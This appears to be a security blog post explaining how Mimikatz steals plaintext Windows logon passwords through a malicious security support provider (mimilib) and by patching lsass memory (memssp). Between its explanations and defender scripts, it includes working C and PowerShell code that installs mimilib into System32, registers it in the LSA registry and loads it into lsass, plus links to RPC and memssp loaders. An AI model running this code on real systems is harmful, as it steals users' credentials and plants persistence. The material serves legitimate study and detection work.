0x00 Introduction

---

mimilib (loaded as an SSP) and misc::memssp in Mimikatz achieve the same end result as sekurlsa::wdigest: plaintext credentials of logged-on users are obtained from the lsass process. sekurlsa::wdigest relies on WDigest keeping plaintext passwords in memory, which is disabled by default on Windows 8.1 / Windows Server 2012 R2 and later (and on older systems once KB2871997 is installed and UseLogonCredential is set to 0). The SSP and memssp approaches instead capture credentials at the moment they are presented to the LSA, so they still work on those systems; because their implementations differ, the conditions under which each works, and the way each is detected, also differ.

After reading the second part of XPN's series I gained a better understanding of this technique, so this post summarizes it and adds some observations of my own.

XPN's blog:

https://blog.xpnsec.com/exploring-mimikatz-part-2/

0x01 Overview

---

This article will cover the following topics:

  • Introduction to SSP
  • How to Develop an SSP
  • How to Enumerate and Remove SSP
  • Three Methods to Add SSP
  • The Method of Modifying Memory with memssp

0x02 Introduction to SSP

---

References:

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn751052(v=ws.11)

SSP, Security Support Provider, also referred to as a security package: a DLL loaded into lsass that implements one authentication protocol.

SSPI, Security Support Provider Interface: the API that Windows applications use for authentication operations; calls made through it are dispatched to the selected SSP.

Put simply, SSPI is the common interface and each SSP is an implementation behind it.

SSP includes the following by default:

  • Kerberos Security Support Provider
  • NTLM Security Support Provider
  • Digest Security Support Provider
  • Schannel Security Support Provider
  • Negotiate Security Support Provider
  • Credential Security Support Provider
  • Negotiate Extensions Security Support Provider
  • PKU2U Security Support Provider

Users can develop and register their own SSPs; once loaded, an SSP is notified of certain authentication and authorization events in the system, including every logon.

This article only covers how to add an SSP that extracts plaintext credentials from the lsass process.

0x03 How to Develop an SSP

---

An SSP is a DLL; the LSA loads it into lsass and calls a small set of exported entry points, each corresponding to a different role.

mimilib in mimikatz is not only an SSP: the same DLL also exports entry points for other roles (for example a password filter and a network provider).

The export through which the LSA initializes an SSP is SpLsaModeInitialize; it hands back the package's function table, and one of the functions in that table (SpAcceptCredentials, below) is where the credentials are captured.

To isolate just this functionality, the other exports can be dropped. The trimmed mimilib.def then contains only:

LIBRARY
EXPORTS
SpLsaModeInitialize = kssp_SpLsaModeInitialize

Implementation code for mimilib extracting plaintext credentials from the lsass process:

https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/kssp.c

The implementation consists of the following four functions (the kssp_* functions in mimilib):

  1. SpInitialize

Called once by the LSA to initialize the package; it receives the LSA's own function table (the package's function table was already returned by SpLsaModeInitialize).

  2. SpShutDown

Called when the package is unloaded.

  3. SpGetInfo

Returns information about the package: version, name and comment.

These are the values shown when enumerating SSPs (the method is described in the next section); mimilib reports the name KiwiSSP.

  4. SpAcceptCredentials

Called by the LSA with the plaintext credentials of each logon so that the package can cache them.

mimilib's implementation instead appends them to the file c:\windows\system32\kiwissp.log.

0x04 How to Enumerate and Remove SSP

---

1. Enumerate SSP

Test code:

#define SECURITY_WIN32

#include <stdio.h>
#include <windows.h>
#include <sspi.h>
#pragma comment(lib,"Secur32.lib")

int main(int argc, char **argv) {
    ULONG packageCount = 0;
    PSecPkgInfoA packages = NULL;

    /* Ask the LSA for the list of packages currently registered */
    if (EnumerateSecurityPackagesA(&packageCount, &packages) == SEC_E_OK) {
        for (ULONG i = 0; i < packageCount; i++) {
            printf("Name: %s\nComment: %s\n\n", packages[i].Name, packages[i].Comment);
        }
        /* The array is allocated by secur32 and must be released with FreeContextBuffer */
        FreeContextBuffer(packages);
    }
    return 0;
}

Note:

Code excerpt from XPN's article

The default result is as shown in the figure below

(figure: output of the enumeration program on a default system)
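The same enumeration can be done without a compiler. The following PowerShell script is an added example (it is not from the original post, from mimikatz or from XPN); it calls EnumerateSecurityPackagesA through P/Invoke exactly as the C program does, then reports any package whose name is not in a baseline. The baseline list is an assumption captured from a default Windows 10 host; capture your own per build and role before relying on it.

```powershell
# Added example: enumerate the security packages lsass exposes through SSPI and
# flag any that are not in a known-good baseline. Not code from the original post.

$sspi = @'
using System;
using System.Runtime.InteropServices;

public static class Sspi
{
    // Mirrors SecPkgInfoA from sspi.h (unsigned long is 32-bit on Windows).
    [StructLayout(LayoutKind.Sequential)]
    public struct SecPkgInfoA
    {
        public uint   fCapabilities;
        public ushort wVersion;
        public ushort wRPCID;
        public uint   cbMaxToken;
        public IntPtr Name;     // SEC_CHAR*
        public IntPtr Comment;  // SEC_CHAR*
    }

    [DllImport("secur32.dll")]
    public static extern int EnumerateSecurityPackagesA(out uint pcPackages, out IntPtr ppPackageInfo);

    [DllImport("secur32.dll")]
    public static extern int FreeContextBuffer(IntPtr pvContextBuffer);
}
'@
Add-Type -TypeDefinition $sspi

function Get-SecurityPackage {
    $count  = [uint32]0
    $buf    = [IntPtr]::Zero
    $status = [Sspi]::EnumerateSecurityPackagesA([ref]$count, [ref]$buf)
    if ($status -ne 0) { throw ('EnumerateSecurityPackagesA failed: 0x{0:X8}' -f $status) }
    try {
        $size = [Runtime.InteropServices.Marshal]::SizeOf([type][Sspi+SecPkgInfoA])
        for ($i = 0; $i -lt $count; $i++) {
            # The buffer is a contiguous array of SecPkgInfoA; walk it by struct size.
            $entry = [Runtime.InteropServices.Marshal]::PtrToStructure(
                         [IntPtr]::Add($buf, $i * $size), [type][Sspi+SecPkgInfoA])
            [pscustomobject]@{
                Name    = [Runtime.InteropServices.Marshal]::PtrToStringAnsi($entry.Name)
                Comment = [Runtime.InteropServices.Marshal]::PtrToStringAnsi($entry.Comment)
                RpcId   = $entry.wRPCID
            }
        }
    } finally {
        # secur32 allocated the array; it must be released with FreeContextBuffer.
        [void][Sspi]::FreeContextBuffer($buf)
    }
}

# Baseline (assumption): package names seen on a default Windows 10 host.
$baseline = @('Negotiate', 'NegoExtender', 'Kerberos', 'NTLM', 'TSSSP', 'pku2u', 'CloudAP',
              'WDigest', 'Schannel', 'Microsoft Unified Security Protocol Provider',
              'Default TLS SSP', 'CREDSSP')

$packages = Get-SecurityPackage
$packages | Format-Table Name, RpcId, Comment -AutoSize
$packages | Where-Object { $baseline -notcontains $_.Name } | ForEach-Object {
    Write-Warning ('Non-baseline security package loaded in lsass: {0} ({1})' -f $_.Name, $_.Comment)
}
# mimilib registers itself as "KiwiSSP" / "Kiwi Security Support Provider" (from kssp.c),
# so once it is loaded it appears in the warning above.
```

The enumeration is answered by lsass itself, so it reflects what is actually loaded rather than what the registry says will be loaded at the next boot; the two views differ after Method 2 or Method 3 below, and comparing them is a cheap check.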

2. Delete SSP

Test code:

#define SECURITY_WIN32

#include <stdio.h>
#include <windows.h>
#include <sspi.h>
#pragma comment(lib,"Secur32.lib")

int main(int argc, char **argv) {
    if (argc < 2) {
        printf("usage: %s <package name>\n", argv[0]);
        return 1;
    }
    /* Package name as reported by EnumerateSecurityPackages, e.g. "KiwiSSP" */
    SECURITY_STATUS nRet = DeleteSecurityPackageA(argv[1]);
    printf("DeleteSecurityPackageA return with 0x%X\n", nRet);
    return 0;
}

In testing it was not possible to delete any SSP; the call always fails with 0x80090302 (SEC_E_UNSUPPORTED_FUNCTION).

After searching, an article with the same result was found:

http://cybernigma.blogspot.com/2014/03/using-sspap-lsass-proxy-to-mitigate.html

The return code suggests that the LSA simply does not implement unloading a package at runtime, so an SSP cannot be removed without a restart: remove its name from the Security Packages registry value and reboot.

Supplement:

To unload a DLL from a process, the following code can be used:

An open-source project

0x05 Three Methods to Add SSP

---

mimilib.dll is used as the example throughout. Note that all three methods end with lsass loading an unsigned DLL; on a host where LSA Protection is enabled (RunAsPPL), lsass only loads Microsoft-signed packages, so an unsigned mimilib.dll is rejected regardless of how it is registered.

Method 1:

(1) Copy the file

Copy mimilib.dll to c:\windows\system32

For 64-bit systems, use the 64-bit mimilib.dll; for 32-bit systems, use the 32-bit mimilib.dll.

(2) Modify the registry

Navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\

Add mimilib.dll to the REG_MULTI_SZ value Security Packages. Append a new line to the multi-string rather than replacing its contents; any package already listed there would otherwise no longer be loaded after the reboot.

(3) Wait for the system to restart

After the reboot, lsass loads mimilib.dll at startup and every logon from then on is appended to c:\windows\system32\kiwissp.log, including the plaintext password of the user logging on.

Method 2: Using the API AddSecurityPackage

(1) Copy files

Same as Method 1

(2) Modify the registry

Same as Method 1

(3) Call AddSecurityPackage

Test code is as follows:

#define SECURITY_WIN32

#include <stdio.h>
#include <windows.h>
#include <sspi.h>
#pragma comment(lib,"Secur32.lib")

int main(int argc, char **argv) {
    SECURITY_PACKAGE_OPTIONS option = { 0 };
    option.Size = sizeof(option);
    option.Flags = 0;
    option.Type = SECPKG_OPTIONS_TYPE_LSA;   /* load into the LSA, not as a client-side package */
    option.SignatureSize = 0;
    option.Signature = NULL;
    /* "mimilib" is resolved like a DLL name; the file must already be in System32 */
    SECURITY_STATUS nRet = AddSecurityPackageA("mimilib", &option);
    printf("AddSecurityPackage return with 0x%X\n", nRet);
    return 0;
}

If the call succeeds, the package is loaded into the running lsass without a reboot (the registry entry from step 2 keeps it loaded across future reboots). The next time credentials are presented, for example through runas or when a user unlocks the workstation, kiwissp.log is written.

Automated implementation of Method 2:

https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/persistence/Install-SSP.ps1
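Methods 1 and 2 share their first two steps, so they can be written as a single PowerShell procedure. The script below is an added example (not the post's own code, not mimikatz and not the Empire module linked above). It assumes a mimilib.dll already built for the target's bitness at $DllPath and an elevated PowerShell session; the registry key, value name and the kiwissp.log path are the ones given above, and everything the script writes (the DLL in System32, the registry entry, the log) is a forensic artifact.

```powershell
# Added example: Method 1 (registry + reboot) and Method 2 (AddSecurityPackageA)
# as one procedure. Assumption: mimilib.dll is next to the script; run elevated.
param([string]$DllPath = '.\mimilib.dll')

$lsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$dest   = Join-Path $env:SystemRoot 'System32\mimilib.dll'

# (1) Copy the DLL to the directory lsass resolves package names from.
Copy-Item -Path $DllPath -Destination $dest -Force

# (2) "Security Packages" is REG_MULTI_SZ. Append to it; overwriting it would stop
#     any package already listed there from loading after the next reboot.
$existing = @((Get-ItemProperty -Path $lsaKey -Name 'Security Packages').'Security Packages' |
              Where-Object { $_ })          # drop the empty placeholder entry
if ($existing -notcontains 'mimilib') {
    Set-ItemProperty -Path $lsaKey -Name 'Security Packages' -Type MultiString `
                     -Value ($existing + 'mimilib')
}
# Method 1 stops here and waits for a reboot.

# (3) Method 2: ask lsass to load the package now through AddSecurityPackageA.
Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;

public static class SspiAdd
{
    // Mirrors SECURITY_PACKAGE_OPTIONS from sspi.h.
    [StructLayout(LayoutKind.Sequential)]
    public struct SECURITY_PACKAGE_OPTIONS
    {
        public uint   Size;
        public uint   Type;
        public uint   Flags;
        public uint   SignatureSize;
        public IntPtr Signature;
    }
    public const uint SECPKG_OPTIONS_TYPE_LSA = 1;

    [DllImport("secur32.dll", CharSet = CharSet.Ansi)]
    public static extern int AddSecurityPackageA(string pszPackageName, ref SECURITY_PACKAGE_OPTIONS pOptions);
}
'@

$opt      = [SspiAdd+SECURITY_PACKAGE_OPTIONS]::new()
$opt.Size = [Runtime.InteropServices.Marshal]::SizeOf([type][SspiAdd+SECURITY_PACKAGE_OPTIONS])
$opt.Type = [SspiAdd]::SECPKG_OPTIONS_TYPE_LSA   # load into the LSA process
$status   = [SspiAdd]::AddSecurityPackageA('mimilib', [ref]$opt)

'AddSecurityPackageA returned 0x{0:X8}' -f $status
if ($status -eq 0) {
    'Package loaded. Trigger a logon (runas, or lock/unlock) and then read:'
    Join-Path $env:SystemRoot 'System32\kiwissp.log'
}
```

Step 3 is the only part that touches the running lsass; steps 1 and 2 alone are Method 1. Both leave the DLL on disk and the name in the registry, which is what the enumeration and artifact checks elsewhere in this post look for.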

Method 3: Using the LSA's RPC interface to make lsass load the DLL

Open-source code by XPN:

https://gist.github.com/xpn/c7f6d15bf15750eae3ec349e7ec2380e

I built it with VS2015; the code needs a few small changes.

Test as shown in the figure below.

(figure: output of XPN's RPC loader after adding the DLL)

Added successfully.

Note:

When building XPN's code (for example with MFC as a static library), the RPC runtime must be linked in by adding: #pragma comment(lib, "Rpcrt4.lib")

Unless the code is modified further, the DLL must be given as an absolute path (the build in my screenshot has been modified to accept a relative path as well).

The output "Error code 0x6c6 returned, which is expected if DLL load returns FALSE" means the DLL was loaded into lsass and its DllMain ran; because DllMain returns FALSE, the loader then unloads it again, which is the expected result.

This is an excellent method, with the following advantages:

  • No write to the registry.
  • No call to the API AddSecurityPackage.
  • No write to the memory of the lsass process.
  • Once DllMain has returned FALSE the DLL is unloaded, so it is not present in lsass afterwards.

0x06 memssp method for modifying memory.

---

This is a feature in mimikatz, with the command as follows:

misc::memssp

Instead of loading a DLL, it patches the memory of the lsass process: mimikatz opens lsass, locates the credential-handling code with build-specific byte patterns and patches it so that every credential presented from then on is written to a log file. The patch exists only in lsass memory, so it does not survive a restart of lsass, and it requires a handle with write access to lsass, which a PPL-protected lsass (RunAsPPL) refuses to ordinary administrator processes.

After executing the command, whenever new credentials are presented (runas, or a user unlocking the workstation), the file mimilsa.log is generated in c:\windows\system32.

XPN implemented the same functionality in the form of a DLL using mimikatz's code as a template, which can be loaded via RPC (method 3 in 0x05) or LoadLibrary

Code repository:

https://gist.github.com/xpn/93f2b75bf086baf2c388b2ddd50fb5d0

The code supports the builds it defines: WIN_BUILD_10_1703x64 and WIN_BUILD_10_1809x64.

For other builds the search patterns and offsets must be adjusted; the per-build values mimikatz uses are here:

https://github.com/gentilkiwi/mimikatz/blob/72b83acb297f50758b0ce1de33f722e70f476250/mimikatz/modules/kuhl_m_misc.c#L483
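Both the SSP methods of 0x05 and memssp leave artifacts that can be checked from the defender's side. The script below is an added example (not from the original post, mimikatz or XPN) that hunts for them: names in the Security Packages value that do not resolve to a signed DLL in System32, the RunAsPPL setting that blocks both techniques, unsigned modules inside lsass, and the two log files named on this page. It assumes an elevated session and the log paths given above; the Lsa\OSConfig subkey is checked as well, which is a second location for this persistence not mentioned on this page.

```powershell
# Added example: hunt for SSP / memssp artifacts. Not code from the original post.
# Assumptions: elevated session; log file names and paths as given in the post.

$lsaKey   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$findings = New-Object System.Collections.Generic.List[string]

function Test-SignedSystemDll([string]$name) {
    # Resolve a Security Packages entry ("kerberos", "mimilib.dll") to System32 and
    # return its Authenticode status, or "missing" if no such file exists.
    $file = if ($name -like '*.dll') { $name } else { "$name.dll" }
    $path = Join-Path $env:SystemRoot "System32\$file"
    if (-not (Test-Path $path)) { return "missing ($path)" }
    (Get-AuthenticodeSignature -FilePath $path).Status.ToString()
}

# 1. Persistence: every entry in Security Packages should be a signed Microsoft DLL.
foreach ($key in $lsaKey, "$lsaKey\OSConfig") {
    $pkgs = (Get-ItemProperty -Path $key -Name 'Security Packages' -ErrorAction SilentlyContinue).'Security Packages'
    foreach ($p in @($pkgs | Where-Object { $_ })) {
        $status = Test-SignedSystemDll $p
        if ($status -ne 'Valid') { $findings.Add("$key\Security Packages lists '$p' -> $status") }
    }
}

# 2. LSA Protection: without it lsass loads unsigned SSPs and accepts memory writes (memssp).
$ppl = (Get-ItemProperty -Path $lsaKey -Name RunAsPPL -ErrorAction SilentlyContinue).RunAsPPL
if (-not $ppl) { $findings.Add('RunAsPPL is not set: unsigned SSPs and user-mode patching of lsass are possible') }

# 3. Runtime: modules currently mapped in lsass that are not validly signed.
try {
    $lsass = Get-Process -Name lsass -ErrorAction Stop
    foreach ($m in $lsass.Modules) {
        $sig = Get-AuthenticodeSignature -FilePath $m.FileName
        if ($sig.Status -ne 'Valid') { $findings.Add("lsass module $($m.FileName): $($sig.Status)") }
    }
} catch {
    # Module enumeration needs PROCESS_VM_READ on lsass; a PPL lsass denies it to non-PPL callers.
    $findings.Add("Could not enumerate lsass modules: $($_.Exception.Message)")
}

# 4. Output files written by mimilib (kiwissp.log) and memssp (mimilsa.log).
foreach ($log in 'kiwissp.log', 'mimilsa.log') {
    $path = Join-Path $env:SystemRoot "System32\$log"
    if (Test-Path $path) {
        $findings.Add("Credential log present: $path ($((Get-Item $path).Length) bytes)")
    }
}

if ($findings.Count) { $findings | ForEach-Object { Write-Warning $_ } }
else { 'No SSP / memssp artifacts found' }
```

Check 3 is the one that distinguishes the methods: Method 1 and Method 2 leave mimilib.dll mapped in lsass, Method 3 does not (DllMain returns FALSE and the DLL is unloaded), and memssp never maps a module at all, so for those two only the log file and the in-memory patch remain. Treat a NotSigned result as a lead rather than a verdict and confirm it with a catalog-aware signature tool before acting on it.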

0x07 Summary

---

Building on XPN's post, this article has introduced two ways Mimikatz extracts credentials from the lsass process, mimilib loaded as an SSP and misc::memssp, and collected the related techniques: developing an SSP, enumerating and (not) removing SSPs, three ways of adding one, and patching lsass memory.